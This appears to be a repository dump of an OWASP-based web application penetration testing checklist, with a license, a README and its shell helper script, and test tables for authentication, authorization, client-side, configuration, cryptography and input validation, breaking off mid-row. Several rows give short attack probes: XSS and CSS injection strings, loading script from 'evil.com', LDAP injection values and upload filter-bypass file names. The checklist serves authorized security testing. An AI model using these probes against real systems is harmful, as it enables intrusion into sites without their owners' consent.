├── COPYING
├── README.md
├── checklist
│   ├── authentication.md
│   ├── authorization.md
│   ├── business_logic.md
│   ├── client_side.md
│   ├── configuration_management.md
│   ├── cryptography.md
│   ├── data_validation.md
│   ├── error_handling.md
│   ├── identity_management.md
│   ├── information_gathering.md
│   └── session_management.md
├── report_template.md
└── variables.yml

/COPYING:
--------------------------------------------------------------------------------
Creative Commons Attribution 4.0 International
==============================================

Creative Commons Corporation ("Creative Commons") is not a law firm and
does not provide legal services or legal advice. Distribution of
Creative Commons public licenses does not create a lawyer-client or
other relationship. Creative Commons makes its licenses and related
information available on an "as-is" basis. Creative Commons gives no
warranties regarding its licenses, any material licensed under their
terms and conditions, or any related information. Creative Commons
disclaims all liability for damages resulting from their use to the
fullest extent possible.

Using Creative Commons Public Licenses

Creative Commons public licenses provide a standard set of terms and
conditions that creators and other rights holders may use to share
original works of authorship and other material subject to copyright
and certain other rights specified in the public license below. The
following considerations are for informational purposes only, are not
exhaustive, and do not form part of our licenses.

     Considerations for licensors: Our public licenses are
     intended for use by those authorized to give the public
     permission to use material in ways otherwise restricted by
     copyright and certain other rights. Our licenses are
     irrevocable. Licensors should read and understand the terms
     and conditions of the license they choose before applying it.
     Licensors should also secure all rights necessary before
     applying our licenses so that the public can reuse the
     material as expected. Licensors should clearly mark any
     material not subject to the license. This includes other CC-
     licensed material, or material used under an exception or
     limitation to copyright. More considerations for licensors:
     wiki.creativecommons.org/Considerations_for_licensors

     Considerations for the public: By using one of our public
     licenses, a licensor grants the public permission to use the
     licensed material under specified terms and conditions. If
     the licensor's permission is not necessary for any reason--for
     example, because of any applicable exception or limitation to
     copyright--then that use is not regulated by the license. Our
     licenses grant only permissions under copyright and certain
     other rights that a licensor has authority to grant. Use of
     the licensed material may still be restricted for other
     reasons, including because others have copyright or other
     rights in the material. A licensor may make special requests,
     such as asking that all changes be marked or described.
     Although not required by our licenses, you are encouraged to
     respect those requests where reasonable. More_considerations
     for the public:
     wiki.creativecommons.org/Considerations_for_licensees

=======================================================================

Creative Commons Attribution 4.0 International Public License

By exercising the Licensed Rights (defined below), You accept and agree
to be bound by the terms and conditions of this Creative Commons
Attribution 4.0 International Public License ("Public License"). To the
extent this Public License may be interpreted as a contract, You are
granted the Licensed Rights in consideration of Your acceptance of
these terms and conditions, and the Licensor grants You such rights in
consideration of benefits the Licensor receives from making the
Licensed Material available under these terms and conditions.


Section 1 -- Definitions.

  a. Adapted Material means material subject to Copyright and Similar
     Rights that is derived from or based upon the Licensed Material
     and in which the Licensed Material is translated, altered,
     arranged, transformed, or otherwise modified in a manner requiring
     permission under the Copyright and Similar Rights held by the
     Licensor. For purposes of this Public License, where the Licensed
     Material is a musical work, performance, or sound recording,
     Adapted Material is always produced where the Licensed Material is
     synched in timed relation with a moving image.

  b. Adapter's License means the license You apply to Your Copyright
     and Similar Rights in Your contributions to Adapted Material in
     accordance with the terms and conditions of this Public License.

  c. Copyright and Similar Rights means copyright and/or similar rights
     closely related to copyright including, without limitation,
     performance, broadcast, sound recording, and Sui Generis Database
     Rights, without regard to how the rights are labeled or
     categorized. For purposes of this Public License, the rights
     specified in Section 2(b)(1)-(2) are not Copyright and Similar
     Rights.

  d. Effective Technological Measures means those measures that, in the
     absence of proper authority, may not be circumvented under laws
     fulfilling obligations under Article 11 of the WIPO Copyright
     Treaty adopted on December 20, 1996, and/or similar international
     agreements.

  e. Exceptions and Limitations means fair use, fair dealing, and/or
     any other exception or limitation to Copyright and Similar Rights
     that applies to Your use of the Licensed Material.

  f. Licensed Material means the artistic or literary work, database,
     or other material to which the Licensor applied this Public
     License.

  g. Licensed Rights means the rights granted to You subject to the
     terms and conditions of this Public License, which are limited to
     all Copyright and Similar Rights that apply to Your use of the
     Licensed Material and that the Licensor has authority to license.

  h. Licensor means the individual(s) or entity(ies) granting rights
     under this Public License.

  i. Share means to provide material to the public by any means or
     process that requires permission under the Licensed Rights, such
     as reproduction, public display, public performance, distribution,
     dissemination, communication, or importation, and to make material
     available to the public including in ways that members of the
     public may access the material from a place and at a time
     individually chosen by them.

  j. Sui Generis Database Rights means rights other than copyright
     resulting from Directive 96/9/EC of the European Parliament and of
     the Council of 11 March 1996 on the legal protection of databases,
     as amended and/or succeeded, as well as other essentially
     equivalent rights anywhere in the world.

  k. You means the individual or entity exercising the Licensed Rights
     under this Public License. Your has a corresponding meaning.


Section 2 -- Scope.

  a. License grant.

       1. Subject to the terms and conditions of this Public License,
          the Licensor hereby grants You a worldwide, royalty-free,
          non-sublicensable, non-exclusive, irrevocable license to
          exercise the Licensed Rights in the Licensed Material to:

            a. reproduce and Share the Licensed Material, in whole or
               in part; and

            b. produce, reproduce, and Share Adapted Material.

       2. Exceptions and Limitations. For the avoidance of doubt, where
          Exceptions and Limitations apply to Your use, this Public
          License does not apply, and You do not need to comply with
          its terms and conditions.

       3. Term. The term of this Public License is specified in Section
          6(a).

       4. Media and formats; technical modifications allowed. The
          Licensor authorizes You to exercise the Licensed Rights in
          all media and formats whether now known or hereafter created,
          and to make technical modifications necessary to do so. The
          Licensor waives and/or agrees not to assert any right or
          authority to forbid You from making technical modifications
          necessary to exercise the Licensed Rights, including
          technical modifications necessary to circumvent Effective
          Technological Measures. For purposes of this Public License,
          simply making modifications authorized by this Section 2(a)
          (4) never produces Adapted Material.

       5. Downstream recipients.

            a. Offer from the Licensor -- Licensed Material. Every
               recipient of the Licensed Material automatically
               receives an offer from the Licensor to exercise the
               Licensed Rights under the terms and conditions of this
               Public License.

            b. No downstream restrictions. You may not offer or impose
               any additional or different terms or conditions on, or
               apply any Effective Technological Measures to, the
               Licensed Material if doing so restricts exercise of the
               Licensed Rights by any recipient of the Licensed
               Material.

       6. No endorsement. Nothing in this Public License constitutes or
          may be construed as permission to assert or imply that You
          are, or that Your use of the Licensed Material is, connected
          with, or sponsored, endorsed, or granted official status by,
          the Licensor or others designated to receive attribution as
          provided in Section 3(a)(1)(A)(i).

  b. Other rights.

       1. Moral rights, such as the right of integrity, are not
          licensed under this Public License, nor are publicity,
          privacy, and/or other similar personality rights; however, to
          the extent possible, the Licensor waives and/or agrees not to
          assert any such rights held by the Licensor to the limited
          extent necessary to allow You to exercise the Licensed
          Rights, but not otherwise.

       2. Patent and trademark rights are not licensed under this
          Public License.

       3. To the extent possible, the Licensor waives any right to
          collect royalties from You for the exercise of the Licensed
          Rights, whether directly or through a collecting society
          under any voluntary or waivable statutory or compulsory
          licensing scheme. In all other cases the Licensor expressly
          reserves any right to collect such royalties.


Section 3 -- License Conditions.

Your exercise of the Licensed Rights is expressly made subject to the
following conditions.

  a. Attribution.

       1. If You Share the Licensed Material (including in modified
          form), You must:

            a. retain the following if it is supplied by the Licensor
               with the Licensed Material:

                 i. identification of the creator(s) of the Licensed
                    Material and any others designated to receive
                    attribution, in any reasonable manner requested by
                    the Licensor (including by pseudonym if
                    designated);

                ii. a copyright notice;

               iii. a notice that refers to this Public License;

                iv. a notice that refers to the disclaimer of
                    warranties;

                 v. a URI or hyperlink to the Licensed Material to the
                    extent reasonably practicable;

            b. indicate if You modified the Licensed Material and
               retain an indication of any previous modifications; and

            c. indicate the Licensed Material is licensed under this
               Public License, and include the text of, or the URI or
               hyperlink to, this Public License.

       2. You may satisfy the conditions in Section 3(a)(1) in any
          reasonable manner based on the medium, means, and context in
          which You Share the Licensed Material. For example, it may be
          reasonable to satisfy the conditions by providing a URI or
          hyperlink to a resource that includes the required
          information.

       3. If requested by the Licensor, You must remove any of the
          information required by Section 3(a)(1)(A) to the extent
          reasonably practicable.

       4. If You Share Adapted Material You produce, the Adapter's
          License You apply must not prevent recipients of the Adapted
          Material from complying with this Public License.


Section 4 -- Sui Generis Database Rights.

Where the Licensed Rights include Sui Generis Database Rights that
apply to Your use of the Licensed Material:

  a. for the avoidance of doubt, Section 2(a)(1) grants You the right
     to extract, reuse, reproduce, and Share all or a substantial
     portion of the contents of the database;

  b. if You include all or a substantial portion of the database
     contents in a database in which You have Sui Generis Database
     Rights, then the database in which You have Sui Generis Database
     Rights (but not its individual contents) is Adapted Material; and

  c. You must comply with the conditions in Section 3(a) if You Share
     all or a substantial portion of the contents of the database.

For the avoidance of doubt, this Section 4 supplements and does not
replace Your obligations under this Public License where the Licensed
Rights include other Copyright and Similar Rights.


Section 5 -- Disclaimer of Warranties and Limitation of Liability.

  a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE
     EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS
     AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF
     ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS,
     IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION,
     WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR
     PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS,
     ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT
     KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT
     ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU.

  b. TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE
     TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION,
     NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT,
     INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES,
     COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR
     USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN
     ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR
     DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR
     IN PART, THIS LIMITATION MAY NOT APPLY TO YOU.

  c. The disclaimer of warranties and limitation of liability provided
     above shall be interpreted in a manner that, to the extent
     possible, most closely approximates an absolute disclaimer and
     waiver of all liability.


Section 6 -- Term and Termination.

  a. This Public License applies for the term of the Copyright and
     Similar Rights licensed here. However, if You fail to comply with
     this Public License, then Your rights under this Public License
     terminate automatically.

  b. Where Your right to use the Licensed Material has terminated under
     Section 6(a), it reinstates:

       1. automatically as of the date the violation is cured, provided
          it is cured within 30 days of Your discovery of the
          violation; or

       2. upon express reinstatement by the Licensor.

     For the avoidance of doubt, this Section 6(b) does not affect any
     right the Licensor may have to seek remedies for Your violations
     of this Public License.

  c. For the avoidance of doubt, the Licensor may also offer the
     Licensed Material under separate terms or conditions or stop
     distributing the Licensed Material at any time; however, doing so
     will not terminate this Public License.

  d. Sections 1, 5, 6, 7, and 8 survive termination of this Public
     License.


Section 7 -- Other Terms and Conditions.

  a. The Licensor shall not be bound by any additional or different
     terms or conditions communicated by You unless expressly agreed.

  b. Any arrangements, understandings, or agreements regarding the
     Licensed Material not stated herein are separate from and
     independent of the terms and conditions of this Public License.


Section 8 -- Interpretation.

  a. For the avoidance of doubt, this Public License does not, and
     shall not be interpreted to, reduce, limit, restrict, or impose
     conditions on any use of the Licensed Material that could lawfully
     be made without permission under this Public License.

  b. To the extent possible, if any provision of this Public License is
     deemed unenforceable, it shall be automatically reformed to the
     minimum extent necessary to make it enforceable. If the provision
     cannot be reformed, it shall be severed from this Public License
     without affecting the enforceability of the remaining terms and
     conditions.

  c. No term or condition of this Public License will be waived and no
     failure to comply consented to unless expressly agreed to by the
     Licensor.

  d. Nothing in this Public License constitutes or may be interpreted
     as a limitation upon, or waiver of, any privileges and immunities
     that apply to the Licensor or You, including from the legal
     processes of any jurisdiction or authority.


=======================================================================

Creative Commons is not a party to its public
licenses. Notwithstanding, Creative Commons may elect to apply one of
its public licenses to material it publishes and in those instances
will be considered the “Licensor.” The text of the Creative Commons
public licenses is dedicated to the public domain under the CC0 Public
Domain Dedication. Except for the limited purpose of indicating that
material is shared under a Creative Commons public license or as
otherwise permitted by the Creative Commons policies published at
creativecommons.org/policies, Creative Commons does not authorize the
use of the trademark "Creative Commons" or any other trademark or logo
of Creative Commons without its prior written consent including,
without limitation, in connection with any unauthorized modifications
to any of its public licenses or any other arrangements,
understandings, or agreements concerning use of licensed material. For
the avoidance of doubt, this paragraph does not form part of the
public licenses.

Creative Commons may be contacted at .

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Penetration Testing Checklist

_OWASP-based Web Application Security Testing Checklist._

[![Creative Commons Attribution 4.0 International](https://img.shields.io/badge/license-CC--BY--4.0-blue?style=flat-square)](https://spdx.org/licenses/CC-BY-4.0.html)

## Motivation

Using a text-based format such as markdown for this checklist allows for easier manipulation via common UNIX command line tools such as `awk`, `grep`, and `sed`.

## GitHub Issues Templates

Copy markdown file(s) to the `.github/ISSUE_TEMPLATE/` directory, prepend the following YAML snippet to the front matter, and customize for each template:

```yaml
about: ~
assignees: ~
labels: ~
name: ~
title: ~
```

## Report Generation

```sh
pandoc report.md -o report.pdf
```

## Acknowledgement

Based on [Prathan Phongthiproek's OWASP Testing Checklist](https://github.com/tanprathan/OWASP-Testing-Checklist).
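
The `awk`/`sed` workflow the Motivation section has in mind, as an added example that is not part of this repository: it renders the `{{proxy}}`-style tool placeholders used in the checklist tables from a `key: value` variables file and tallies the Status column. `VARS` and `CHECKLIST` are constructed stand-ins for `variables.yml` and a checklist file (the repository's real `variables.yml` is not shown on this page), and the function names are this example's own.

```sh
#!/bin/sh
# Added example, not part of the repository: render {{tool}} placeholders
# in a checklist from a "key: value" variables file and tally the Status
# column, using only sed/awk/sort as the README suggests.
# VARS and CHECKLIST are constructed stand-ins for variables.yml and a
# checklist file; the repository's real variables.yml is not shown here.

# Constructed stand-in for variables.yml: one "key: value" per line.
VARS='proxy: Burp Suite
browser: Firefox
scanner: Nikto
custom: sqlmap'

# Constructed checklist excerpt in the repository's table layout. The last
# row carries an escaped pipe (\|) inside its Description cell, as the
# OTG-CONFIG-007 row does, which naive column counting gets wrong.
CHECKLIST='|Authentication Testing|Test Name|Description|Tools|Status|Comment|
|----------------------|---------|-----------|-----|------|-------|
|OTG-AUTHN-001|Credentials Transported over Unencrypted Channel|HTTP vs HTTPS|{{proxy}}|Not Started||
|OTG-AUTHN-003|Weak Lock-out Mechanism|Lockout and unlock|{{browser}}|Pass||
|OTG-AUTHN-009|Weak Password Change/Reset Functionality|Reset token, CSRF?|{{browser}}, {{proxy}}|Fail||
|OTG-CONFIG-007|HTTP Strict-Transport-Security|`curl -s -D- https://domain.com \| grep Strict`|{{proxy}}|Fail||'

# render_vars VARS: replace every {{key}} in the markdown on stdin with
# the value for key in VARS. awk turns each variable line into one sed
# substitution; "/" and "&" in values are escaped so sed treats them
# literally in the replacement.
render_vars() {
    script=$(printf '%s\n' "$1" | awk '
        /^[A-Za-z_][A-Za-z0-9_]*: / {
            key = $1
            sub(/:$/, "", key)
            val = substr($0, length($1) + 2)
            gsub("[/&]", "\\\\&", val)
            printf "s/{{%s}}/%s/g\n", key, val
        }')
    sed "$script"
}

# status_summary: count checklist rows per Status value. Status is read
# from the end of the row (NF-2: before Comment and the trailing empty
# field) rather than as a fixed column, so an escaped pipe inside a
# Description cell does not shift it. Header and separator rows are
# skipped.
status_summary() {
    awk -F'|' '
        substr($0, 1, 1) == "|" && NF >= 7 {
            s = $(NF - 2)
            if (s == "Status" || s ~ /^-+$/) next
            n[s]++
        }
        END { for (s in n) printf "%s %d\n", s, n[s] }' | sort
}

# rows_with_status STATUS: print the test IDs whose Status equals STATUS,
# e.g. the open items, or the Fail items to carry into the report.
rows_with_status() {
    awk -F'|' -v want="$1" '
        substr($0, 1, 1) == "|" && NF >= 7 && $(NF - 2) == want { print $2 }'
}

# Usage when run directly: the rendered table, the tally, the open items.
printf '%s\n' "$CHECKLIST" | render_vars "$VARS"
printf '%s\n' "$CHECKLIST" | status_summary
printf '%s\n' "$CHECKLIST" | rows_with_status 'Not Started'
```

To apply it to the real files, feed `checklist/*.md` to `render_vars "$(cat variables.yml)"` before running `pandoc`, so the report names the actual tools instead of placeholders. Reading Status from the end of the row is the detail worth keeping: the checklist escapes literal pipes in descriptions as `\|`, and awk still splits on them.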

Converted to Markdown via [Kyokomi's excel-to-markdown](https://github.com/kyokomi/excel-to-markdown).

## License

This work is licensed under a [Creative Commons Attribution 4.0 International License](COPYING).

## Reference

- [GitHub Help: Configuring issue templates for your repository](https://help.github.com/en/github/building-a-strong-community/configuring-issue-templates-for-your-repository)

- [Pandoc User's Guide: Creating a PDF](https://pandoc.org/MANUAL.html#creating-a-pdf)

## See Also

- [Penetration Testing Guide](https://github.com/oxr463/pentesting-guide)

- [Penetration Testing Virtual Machine](https://github.com/oxr463/pentesting-vm)

--------------------------------------------------------------------------------
/checklist/authentication.md:
--------------------------------------------------------------------------------
---
---

|Authentication Testing|Test Name|Description|Tools|Status|Comment|
|----------------------|---------|-----------|-----|------|-------|
|OTG-AUTHN-001|Credentials Transported over Unencrypted Channel|Check whether the login page and the request it submits to use HTTP or HTTPS (including the Referer of the submission). Try sending the credentials over plain HTTP as well as HTTPS.|{{proxy}}|Not Started||
|OTG-AUTHN-002|Default Credentials|Test for default credentials of common applications. Test for default passwords on newly created accounts.|{{proxy}}|Not Started||
|OTG-AUTHN-003|Weak Lock-out Mechanism|Evaluate the account lockout mechanism’s ability to mitigate brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.|{{browser}}|Not Started||
|OTG-AUTHN-004|Authentication Schema Bypass|Force browsing (`/admin/main.php`, `/page.asp?authenticated=yes`), parameter modification, session ID prediction, SQL injection.|{{proxy}}|Not Started||
|OTG-AUTHN-005|Remember Password Functionality|Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text but are hashed (a password hash in a cookie is still a reusable credential; a random token is preferable). Is `autocomplete=off` set on credential fields?|{{proxy}}|Not Started||
|OTG-AUTHN-006|Browser Cache Weakness|Check for browser history issues by clicking "Back" after logging out. Check the HTTP response headers for cache directives (`Cache-Control: no-cache, no-store`; `no-cache` alone only forces revalidation and still lets the browser keep a copy).|{{proxy}}|Not Started||
|OTG-AUTHN-007|Weak Password Policy|Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of passwords.|{{proxy}}|Not Started||
|OTG-AUTHN-008|Weak Security Question/Answer|Test for weak pre-generated questions, test for weak self-generated questions, test for brute-forcible answers (unlimited attempts?).|{{browser}}|Not Started||
|OTG-AUTHN-009|Weak Password Change/Reset Functionality|Test password reset (old password displayed in plain text? sent via email? random token in the confirmation email?). Test password change (old password required?). CSRF vulnerability?|{{browser}}, {{proxy}}|Not Started||
|OTG-AUTHN-010|Weaker Authentication in Alternative Channel|Understand the primary mechanism and identify other channels (mobile app, call center, SSO).|{{browser}}|Not Started||

--------------------------------------------------------------------------------
/checklist/authorization.md:
--------------------------------------------------------------------------------
---
---

|Authorization Testing|Test Name|Description|Tools|Status|Comment|
|---------------------|---------|-----------|-----|------|-------|
|OTG-AUTHZ-001|Directory Traversal/File Include|Dot-dot-slash attack (`../`), directory traversal, local file inclusion/remote file inclusion.|{{proxy}}|Not Started||
|OTG-AUTHZ-002|Authorization Schema Bypass|Can a resource be accessed without authentication? Bypass ACLs, force browsing (`/admin/adduser.jsp`).|{{proxy}}|Not Started||
|OTG-AUTHZ-003|Privilege Escalation|Test for role/privilege escalation by manipulating the values of hidden variables, e.g. change `groupid=2` to `groupid=1`.|{{proxy}}|Not Started||
|OTG-AUTHZ-004|Insecure Direct-Object Reference|Force a change of parameter value (`?invoice=123` -> `?invoice=456`) and check whether another user's object is returned.|{{proxy}}|Not Started||

--------------------------------------------------------------------------------
/checklist/business_logic.md:
--------------------------------------------------------------------------------
---
---

|Business Logic Testing|Test Name|Description|Tools|Status|Comment|
|----------------------|---------|-----------|-----|------|-------|
|OTG-BUSLOGIC-001|Business Logic Data Validation|Look for data entry points or hand-off points between systems or software. Once found, try to insert logically invalid data into the application/system.|{{proxy}}|Not Started||
|OTG-BUSLOGIC-002|Ability to Forge Requests|Look for guessable, predictable or hidden functionality of fields. Once found, try to insert logically valid data into the application/system that lets the user go through the application/system against the normal business logic workflow.|{{proxy}}|Not Started||
|OTG-BUSLOGIC-003|Integrity Checks|Look for parts of the application/system (components, e.g. input fields, databases or logs) that move, store or handle data/information. For each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also consider who, according to the business logic, is allowed to insert, update and delete data/information in each component. Attempt to insert, update or delete data/information values with invalid data/information in each component (input, database, or log) as users who should not be allowed to per the business logic workflow.|{{proxy}}|Not Started||
|OTG-BUSLOGIC-004|Process Timing|Look for application/system functionality that may be impacted by time, such as execution time, or actions that help users predict a future outcome or allow them to circumvent any part of the business logic or workflow (for example, not completing transactions in the expected time). Develop and execute the misuse cases, ensuring that attackers cannot gain an advantage based on timing.|{{proxy}}|Not Started||
|OTG-BUSLOGIC-005|Number of Times a Function Can be Used Limits|Look for functions or features in the application or system that should not be executed more than a single time or a specified number of times during the business logic workflow. For each of them, develop abuse/misuse cases that may allow a user to execute it more than the allowable number of times.|{{proxy}}|Not Started||
|OTG-BUSLOGIC-006|Circumvention of Work Flows|Look for methods to skip steps, or to perform them in a different order from the designed/intended business logic flow. For each method develop a misuse case and try to circumvent the flow or perform an action that is "not acceptable" per the business logic workflow.|{{proxy}}|Not Started||
|OTG-BUSLOGIC-007|Defenses Against Application Mis-use|Measures that might indicate the application has built-in self-defense: changed responses, blocked requests, actions that log a user out or lock their account.|{{proxy}}|Not Started||
|OTG-BUSLOGIC-008|Upload of Unexpected File Types|Review the project documentation and perform some exploratory testing looking for file types that should be "unsupported" by the application/system. Try to upload these "unsupported" files and verify that they are properly rejected. If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. Extensions that slip past naive filters: `file.phtml`, `shell.phPWND`, `SHELL~1.PHP`.|{{proxy}}|Not Started||
|OTG-BUSLOGIC-009|Upload of Malicious Files|Develop or acquire a known "malicious" file. Try to upload the malicious file to the application/system and verify that it is correctly rejected. If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.|{{proxy}}|Not Started||

--------------------------------------------------------------------------------
/checklist/client_side.md:
--------------------------------------------------------------------------------
---
---

|Client-Side Testing|Test Name|Description|Tools|Status|Comment|
|-------------------|---------|-----------|-----|------|-------|
|OTG-CLIENT-001|DOM-based Cross-Site Scripting|Test the user inputs obtained from client-side JavaScript objects (sources such as `location`, `document.referrer`, `window.name`) and where they flow into the DOM.|{{proxy}}|Not Started||
|OTG-CLIENT-002|JavaScript Execution|Inject JavaScript code: `www.victim.com/?javascript:alert(1)`|{{proxy}}|Not Started||
|OTG-CLIENT-003|HTML Injection|Send malicious HTML code: `?user=`|{{proxy}}|Not Started||
|OTG-CLIENT-004|Client-Side URL Redirect|Modify untrusted URL input to point at an attacker-controlled site (open redirect): `?redirect=www.fake-target.site`|{{proxy}}|Not Started||
|OTG-CLIENT-005|CSS Injection|Inject code in the CSS context: `www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current;` (Opera 8 to 12), `www.victim.com/#red;-:expression(alert(URL=1));` (IE 7/8)|{{proxy}}|Not Started||
|OTG-CLIENT-006|Client-Side Resource Manipulation|External JavaScript can be injected into the trusted web site when a resource path is taken from the URL: `www.victim.com/#http://evil.com/js.js`|{{proxy}}|Not Started||
|OTG-CLIENT-007|Cross-Origin Resource Sharing|Check the HTTP headers in order to understand how CORS is used (`Origin` request header, `Access-Control-Allow-Origin` and `Access-Control-Allow-Credentials` response headers).|{{proxy}}|Not Started||
|OTG-CLIENT-008|Cross-Site Flashing|Decompile; look for undefined variables and unsafe methods; include a malicious SWF (`http://victim/file.swf?lang=http://evil`).|{{custom}}|Not Started||
|OTG-CLIENT-009|Clickjacking|Discover whether a website is vulnerable by loading it into an iframe: create a simple web page that includes a frame containing the target.|{{proxy}}|Not Started||
|OTG-CLIENT-010|WebSockets|Identify that the application is using WebSockets by inspecting for the `ws://` or `wss://` URI scheme. Use the browser's developer tools to view the WebSocket traffic in the Network tab. Check Origin, confidentiality and integrity, authentication, authorization, input sanitization.|{{proxy}}|Not Started||
|OTG-CLIENT-011|Web Messaging|Analyse the JavaScript code to see how Web Messaging (`postMessage`) is implemented: how the website restricts messages from untrusted origins, and how the data is handled even for trusted origins.|{{proxy}}|Not Started||
|OTG-CLIENT-012|Local Storage|Determine whether the website is storing sensitive data in local or session storage. XSS via localStorage: `http://server/StoragePOC.html#`|{{browser}}, {{proxy}}|Not Started||

--------------------------------------------------------------------------------
/checklist/configuration_management.md:
--------------------------------------------------------------------------------
---
---

|Configuration and Deployment Management Testing|Test Name|Description|Tools|Status|Comment|
|-----------------------------------------------|---------|-----------|-----|------|-------|
|OTG-CONFIG-001|Network/Infrastructure Configuration|Understand the interactions between infrastructure elements and the configuration management of the software, backend DB server, WebDAV, FTP, in order to identify known vulnerabilities.|{{scanner}}|Not Started||
|OTG-CONFIG-002|Application Platform Configuration|Identify default installation files/directories, handling of server errors (40x, 50x), minimal privilege, software logging.|{{browser}}|Not Started||
|OTG-CONFIG-003|File Extensions Handling for Sensitive Information|Find important files and information by extension (.asa, .inc, .sql, .zip, .tar, .pdf, .txt, etc.).|{{browser}}|Not Started||
|OTG-CONFIG-004|Backup and Unreferenced Files for Sensitive Information|Check JS source code, comments, cache files, backup files (.old, .bak, .inc, .src) and guess filenames.|{{scanner}}|Not Started||
|OTG-CONFIG-005|Enumerate Infrastructure and Application Admin Interfaces|Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc.), alternative server ports (e.g. Tomcat on 8080).|{{proxy}}|Not Started||
|OTG-CONFIG-006|HTTP Methods|Identify the HTTP methods the web server allows with OPTIONS (the `Allow` header is only what the server admits to; also send each method directly). Test arbitrary HTTP methods, HEAD access control bypass and XST via TRACE.|{{proxy}}|Not Started||
|OTG-CONFIG-007|HTTP Strict-Transport-Security|Identify the HSTS header in the web server's HTTP response: `curl -s -D- https://domain.com \| grep Strict`|{{proxy}}|Not Started||
|OTG-CONFIG-008|RIA Cross-Domain Policy|Analyse the permissions granted by the policy files (crossdomain.xml/clientaccesspolicy.xml) and their allow-access-from entries.|{{proxy}}|Not Started||

--------------------------------------------------------------------------------
/checklist/cryptography.md:
--------------------------------------------------------------------------------
---
---

|Cryptography|Test Name|Description|Tools|Status|Comment|
|------------|---------|-----------|-----|------|-------|
|OTG-CRYPST-001|Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection|Identify SSL/TLS services; identify weak ciphers/protocols and the known attacks against them (e.g. RC4, BEAST, CRIME, POODLE).|{{custom}}|Not Started||
|OTG-CRYPST-002|Padding Oracle|Compare the responses in three different states: (1) the ciphertext decrypts and the resulting data is correct; (2) the ciphertext decrypts but the resulting data is garbled and causes an exception or error handling in the application logic; (3) decryption fails because of a padding error.|{{custom}}|Not Started||
|OTG-CRYPST-003|Sensitive Information Sent via Unencrypted Channels|Check sensitive data during transmission: information used in authentication (e.g. credentials, PINs, session identifiers, tokens, cookies), information protected by laws, regulations or specific organizational policy (e.g. credit cards, customer data).|{{proxy}}|Not Started||

--------------------------------------------------------------------------------
/checklist/data_validation.md:
--------------------------------------------------------------------------------
---
---

|Data Validation Testing|Test Name|Description|Tools|Status|Comment|
|-----------------------|---------|-----------|-----|------|-------|
|OTG-INPVAL-001|Reflected Cross-Site Scripting|Check input validation; replace the vector used to identify XSS; XSS with HTTP Parameter Pollution.|{{proxy}}|Not Started||
|OTG-INPVAL-002|Stored Cross-Site Scripting|Check input forms/upload forms and analyse the rendered HTML; leverage XSS with BeEF.|{{proxy}}|Not Started||
|OTG-INPVAL-003|HTTP Verb Tampering|Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.|{{proxy}}|Not Started||
|OTG-INPVAL-004|HTTP Parameter Pollution|Identify any form or action that allows user-supplied input to bypass input validation and filters using HPP.|{{proxy}}|Not Started||
|OTG-INPVAL-005|SQL Injection|Union, boolean, error based, out-of-band, time delay.|{{custom}}|Not Started||
||Oracle||{{custom}}|Not Started||
||MySQL||{{custom}}|Not Started||
||Microsoft SQL||{{custom}}|Not Started||
||PostgreSQL||{{custom}}|Not Started||
||Microsoft Access||{{custom}}|Not Started||
||NoSQL Injection||{{custom}}|Not Started||
|OTG-INPVAL-006|LDAP Injection|`/ldapsearch?user=*`, `user=*user=*)(uid=*))(\|(uid=*`, `pass=password`|{{proxy}}|Not Started||
|OTG-INPVAL-007|ORM Injection|Testing for ORM injection is identical to SQL injection testing.|{{custom}}|Not Started||
|OTG-INPVAL-008|XML Injection|Check with XML meta characters `', " , <>, , &, , XXE, TAG`|{{proxy}}|Not Started||
|OTG-INPVAL-009|SSI Injection|Presence of the .shtml extension; check for these characters: `< ! # = / . 
